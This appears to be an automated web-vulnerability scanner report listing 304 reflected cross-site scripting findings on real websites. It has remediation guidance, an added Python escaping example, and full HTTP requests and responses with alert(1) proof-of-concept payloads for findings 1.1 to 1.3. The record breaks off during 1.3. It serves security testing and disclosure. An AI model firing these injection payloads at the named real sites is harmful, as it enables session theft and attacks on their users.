1.153. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 4]

1.154. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 5]

1.155. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 6]

1.156. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 7]

1.157. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [name of an arbitrarily supplied request parameter]

1.158. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [REST URL parameter 1]

1.159. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [REST URL parameter 2]

1.160. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [REST URL parameter 3]

1.161. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [REST URL parameter 4]

1.162. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [REST URL parameter 5]

1.163. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [name of an arbitrarily supplied request parameter]

1.164. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 1]

1.165. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 2]

1.166. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 3]

1.167. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 4]

1.168. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 5]

1.169. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 6]

1.170. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 7]

1.171. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [name of an arbitrarily supplied request parameter]

1.172. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [REST URL parameter 1]

1.173. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [REST URL parameter 2]

1.174. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [REST URL parameter 3]

1.175. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [REST URL parameter 4]

1.176. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [REST URL parameter 5]

1.177. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [name of an arbitrarily supplied request parameter]

1.178. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 1]

1.179. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 2]

1.180. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 3]

1.181. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 4]

1.182. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 5]

1.183. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 6]

1.184. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 7]

1.185. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [name of an arbitrarily supplied request parameter]

1.186. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [REST URL parameter 1]

1.187. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [REST URL parameter 2]

1.188. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [REST URL parameter 3]

1.189. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [REST URL parameter 4]

1.190. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [REST URL parameter 5]

1.191. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [name of an arbitrarily supplied request parameter]

1.192. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 1]

1.193. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 2]

1.194. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 3]

1.195. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 4]

1.196. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 5]

1.197. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [name of an arbitrarily supplied request parameter]

1.198. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 1]

1.199. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 2]

1.200. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 3]

1.201. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 4]

1.202. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 5]

1.203. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [name of an arbitrarily supplied request parameter]

1.204. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 1]

1.205. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 2]

1.206. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 3]

1.207. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 4]

1.208. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 5]

1.209. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [name of an arbitrarily supplied request parameter]

1.210. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 1]

1.211. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 2]

1.212. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 3]

1.213. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 4]

1.214. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 5]

1.215. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [name of an arbitrarily supplied request parameter]

1.216. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 1]

1.217. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 2]

1.218. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 3]

1.219. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 4]

1.220. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 5]

1.221. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [name of an arbitrarily supplied request parameter]

1.222. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 1]

1.223. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 2]

1.224. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 3]

1.225. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 4]

1.226. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 5]

1.227. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [name of an arbitrarily supplied request parameter]

1.228. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [REST URL parameter 1]

1.229. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [REST URL parameter 2]

1.230. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [REST URL parameter 3]

1.231. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [REST URL parameter 4]

1.232. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [REST URL parameter 5]

1.233. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [name of an arbitrarily supplied request parameter]

1.234. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 1]

1.235. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 2]

1.236. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 3]

1.237. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 4]

1.238. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 5]

1.239. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 6]

1.240. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [name of an arbitrarily supplied request parameter]

1.241. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 1]

1.242. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 2]

1.243. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 3]

1.244. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 4]

1.245. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 5]

1.246. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 6]

1.247. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 7]

1.248. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 8]

1.249. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [name of an arbitrarily supplied request parameter]

1.250. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 1]

1.251. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 2]

1.252. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 3]

1.253. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 4]

1.254. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 5]

1.255. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 6]

1.256. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 7]

1.257. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 8]

1.258. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [name of an arbitrarily supplied request parameter]

1.259. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 1]

1.260. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 2]

1.261. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 3]

1.262. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 4]

1.263. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 5]

1.264. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [name of an arbitrarily supplied request parameter]

1.265. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 1]

1.266. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 2]

1.267. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 3]

1.268. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 4]

1.269. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 5]

1.270. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [name of an arbitrarily supplied request parameter]

1.271. http://www.installsoftware.com/xmlrpc.php [REST URL parameter 1]

1.272. http://www.intensedebate.com/ [name of an arbitrarily supplied request parameter]

1.273. http://www.intensedebate.com/js/genericCommentWrapperV2.js [REST URL parameter 2]

1.274. http://www.intensedebate.com/themes/chameleon/css/idcCSS.php [REST URL parameter 4]

1.275. http://www.intensedebate.com/themes/chameleon/css/idcCSS.php [name of an arbitrarily supplied request parameter]

1.276. http://www.intensedebate.com/wCSS.php [REST URL parameter 1]

1.277. http://www.intensedebate.com/wCSS.php [name of an arbitrarily supplied request parameter]

1.278. http://www.intensedebate.com/widgets/acctComment/22911/5 [REST URL parameter 1]

1.279. http://www.intensedebate.com/widgets/acctComment/22911/5 [REST URL parameter 3]

1.280. http://www.metacafe.com/fplayer/ [name of an arbitrarily supplied request parameter]

1.281. http://www.paloaltonetworks.com/literature/forms/ebook/index.php [name of an arbitrarily supplied request parameter]

1.282. http://www.scstudio.tv/ [name of an arbitrarily supplied request parameter]

1.283. http://www.scstudio.tv/favicon.ico [name of an arbitrarily supplied request parameter]

1.284. http://www.scvision.tv/ [name of an arbitrarily supplied request parameter]

1.285. http://www.scwebcasts.tv/ [name of an arbitrarily supplied request parameter]

1.286. http://www.technewsworld.com/mwjson/ [action parameter]

1.287. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [REST URL parameter 1]

1.288. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [REST URL parameter 2]

1.289. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [REST URL parameter 3]

1.290. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [REST URL parameter 4]

1.291. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [name of an arbitrarily supplied request parameter]

1.292. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CC4Q-AsoATAA\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNHA8oKYn9FF9KIbtgEvk7ET4aEESg\\x22 parameter]

1.293. http://www.channelinsider.com/c/a/Security/Social-Media-Applications-a-Threat-to-Businesses-Report-707207/x22 [Referer HTTP header]

1.294. http://www.haymarketbusinesssubs.com/subscriptions/ [Referer HTTP header]

1.295. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [Referer HTTP header]

1.296. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

1.297. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

1.298. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

1.299. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

1.300. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

1.301. http://ar.voicefive.com/bmx3/broker.pli [ar_p68511049 cookie]

1.302. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

1.303. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

1.304. http://www.feedblitz.com/f/f.fbz [name of an arbitrarily supplied request parameter]

1. Cross-site scripting (reflected)
There are 304 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses. First, input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain: a path segment or parameter that is meant to be an identifier, for example, should be rejected if it contains anything outside an allowlist of expected characters. Second, user input should be encoded at any point where it is copied into application responses, using the encoding that matches the context it lands in: HTML-encoding for text between tags and for quoted attribute values, and JavaScript-string escaping (or JSON serialisation) for values placed inside script. Escaping intended for one context does not protect another, as several findings in this report show. In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
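The two layers above, applied to the reflection shapes that recur in this report: a request path echoed into a 404 page (1.1), a parameter name echoed into a quoted href after backslash-escaping (1.5), values landing in a JavaScript response as a callback name or inside a string literal (1.2 to 1.4), and a blocklist defeated by an encoded NULL byte (1.6). This is an added example, not code from any of the scanned sites or from the scanner; the inputs are constructed to match the report's payload shapes, example.invalid is a placeholder host, and the function names are the editor's own.

```python
"""Context-aware validation and output encoding for the reflection patterns
in this report. Added example: the fragments below are constructed to mirror
findings 1.1, 1.2-1.4, 1.5 and 1.6; example.invalid is a placeholder host."""
import html
import json
import re
import urllib.parse

# Constructed inputs shaped like the report's payloads.
PATH_PAYLOAD = "/quotetoolsdc7e6<img src=a onerror=alert(1)>ac1cc16112d/clientForward"
ATTR_PAYLOAD = '9f455"><script>alert(1)</script>18723730872'
JS_PAYLOAD = "186035359f00d0<script>alert(1)</script>4ba25d4dfdf"


# --- Finding 1.1 shape: request path echoed into a 404 page ------------------

def render_404_vulnerable(path: str) -> str:
    """'Before': the raw path is concatenated into the document body."""
    return (f"<title>404 Invalid path {path} was requested</title>\n"
            f"<h1>404 Invalid path {path} was requested</h1>")


def render_404_hardened(path: str) -> str:
    """'After': HTML-encode at the point of output. html.escape(quote=True)
    turns & < > \" ' into entities, so the browser sees text, not markup."""
    safe = html.escape(path, quote=True)
    return (f"<title>404 Invalid path {safe} was requested</title>\n"
            f"<h1>404 Invalid path {safe} was requested</h1>")


# --- Finding 1.5 shape: parameter name echoed into a quoted href -------------

def paging_link_backslash(param_name: str) -> str:
    """Mirrors the site's behaviour: a backslash is put before the quote
    (addslashes-style). That is a string-literal escape; inside an HTML
    attribute the '"' still terminates the value, so the breakout succeeds."""
    escaped = param_name.replace('"', '\\"')
    return f'<a href="http://example.invalid/?{escaped}=1&paged=2">'


def paging_link_hardened(param_name: str) -> str:
    """Encode for each context in turn: percent-encode for the URL, then
    HTML-encode the whole URL for the attribute (the '&' separator becomes '&amp;')."""
    url = "http://example.invalid/?" + urllib.parse.quote(param_name, safe="") + "=1&paged=2"
    return f'<a href="{html.escape(url, quote=True)}">'


# --- Findings 1.2-1.4 shape: values landing inside a JavaScript response -----

CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")


def callback_name_ok(name: str) -> bool:
    """A callback name becomes JavaScript code verbatim, so encoding cannot
    help; only an allowlist of dotted identifiers is acceptable."""
    return CALLBACK_RE.fullmatch(name) is not None


def js_string_literal(value: str) -> str:
    """Embed a value in JS source as a string literal. json.dumps escapes
    quotes and backslashes; < > & are additionally escaped so the result stays
    safe if the script is later inlined into an HTML page."""
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


# --- Finding 1.6 shape: NUL byte defeats a native-style blocklist -------------

def native_blocklist_blocks(decoded: str) -> bool:
    """Simulates a filter written in native code that treats the input as a
    NUL-terminated C string: everything after the first NUL is never inspected."""
    inspected = decoded.split("\x00", 1)[0]
    return "<script" in inspected.lower()


SEGMENT_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def path_segment_ok(raw_segment: str) -> bool:
    """Allowlist validation on arrival: decode first, then check the whole
    decoded value. A NUL byte or any markup character fails the pattern."""
    decoded = urllib.parse.unquote(raw_segment)
    return SEGMENT_RE.fullmatch(decoded) is not None


if __name__ == "__main__":
    print(render_404_hardened(PATH_PAYLOAD))
    print(paging_link_hardened(ATTR_PAYLOAD))
    print(js_string_literal(JS_PAYLOAD))
    print(path_segment_ok("submit"), path_segment_ok('submit%005f73f"><script>alert(1)</script>'))
```

The allowlist checks are the cheaper fix for identifiers such as path segments and callback names, because no encoding can make an attacker-chosen function name safe to execute. The encoding functions are the fix for free-text values, and the order in paging_link_hardened matters: percent-encode for the URL first, then HTML-encode for the attribute, so each layer only has to be correct for its own context.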


1.1. http://app.quotemedia.com/quotetools/clientForward [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.quotemedia.com
Path:   /quotetools/clientForward

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc7e6<img%20src%3da%20onerror%3dalert(1)>ac1cc16112d was submitted in the REST URL parameter 1. This input was echoed as dc7e6<img src=a onerror=alert(1)>ac1cc16112d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses an event handler to introduce arbitrary JavaScript into the document. Note that the path is reflected twice: inside <title>, whose content is not parsed as markup, so the event handler there is inert; and inside <h1>, where the <img> element is parsed and the onerror handler fires. Although the page body reports a 404, the response status is 200 OK.

Request

GET /quotetoolsdc7e6<img%20src%3da%20onerror%3dalert(1)>ac1cc16112d/clientForward HTTP/1.1
Host: app.quotemedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.14
Cache-Control: private
Set-Cookie: JSESSIONID=bEzcsHlMkwE6; path=/
Content-Type: text/html
Date: Mon, 31 Jan 2011 17:19:30 GMT
Content-Length: 1250

<title>404 Invalid path /quotetoolsdc7e6<img src=a onerror=alert(1)>ac1cc16112d/invalidSite was requested</title>
<h1>404 Invalid path /quotetoolsdc7e6<img src=a onerror=alert(1)>ac1cc16112d/invalidSite was requested</h1>
...[SNIP]...

1.2. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 7bb68<script>alert(1)</script>56b71eeb362 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note the context: the response is served as application/x-javascript, and the func value is written directly into JavaScript source as the name of the function to call (a JSONP-style callback), so whatever is reflected is executed as script by any page that includes this URL. A payload for this context is a JavaScript expression rather than an HTML tag, and the fix is to allowlist the callback name rather than to HTML-encode it.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction7bb68<script>alert(1)</script>56b71eeb362&n=ar_int_p85001580&1296491560510 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.22;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a/L46/1678441172/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/RadioShack/SELL_2011Q1/RTG/728/L36/772729617/x90/USNetwork/RS_SELL_2011Q1_247_RTG_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=772729617?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=1&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 16:31:23 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=40&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Jan 31 16:32:02 2011&prad=58087570&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296491524%2E335%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:09:01 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction7bb68<script>alert(1)</script>56b71eeb362("");

1.3. http://ar.voicefive.com/bmx3/broker.pli [AR_C parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the AR_C request parameter is copied into the HTML document as plain text between tags. The payload f00d0<script>alert(1)</script>4ba25d4dfdf was submitted in the AR_C parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note the context: the response is served as application/x-javascript and the value lands inside a double-quoted JavaScript string literal (Arc:"..."), so a payload for this context closes the string with a double quote, and the fix is JavaScript-string escaping or JSON serialisation of the value rather than HTML-encoding. The same value is also written back into the ar_p68511049 cookie (see the Set-Cookie header below), and these cookies appear later in this report as reflection sources in their own right (1.296 to 1.303).

Request

GET /bmx3/broker.pli?pid=p68511049&PRAd=264243128&AR_C=186035359f00d0<script>alert(1)</script>4ba25d4dfdf HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://redcated/MRT/iview/264243128/direct;wi.640;hi.480/01?ENN_rnd=12964914777625&click=http://www.ectnews.com/adsys/link/%3Fcreative%3d7040%26ENN_rnd%3d12964914777625%26ENN_target=
Accept: */*
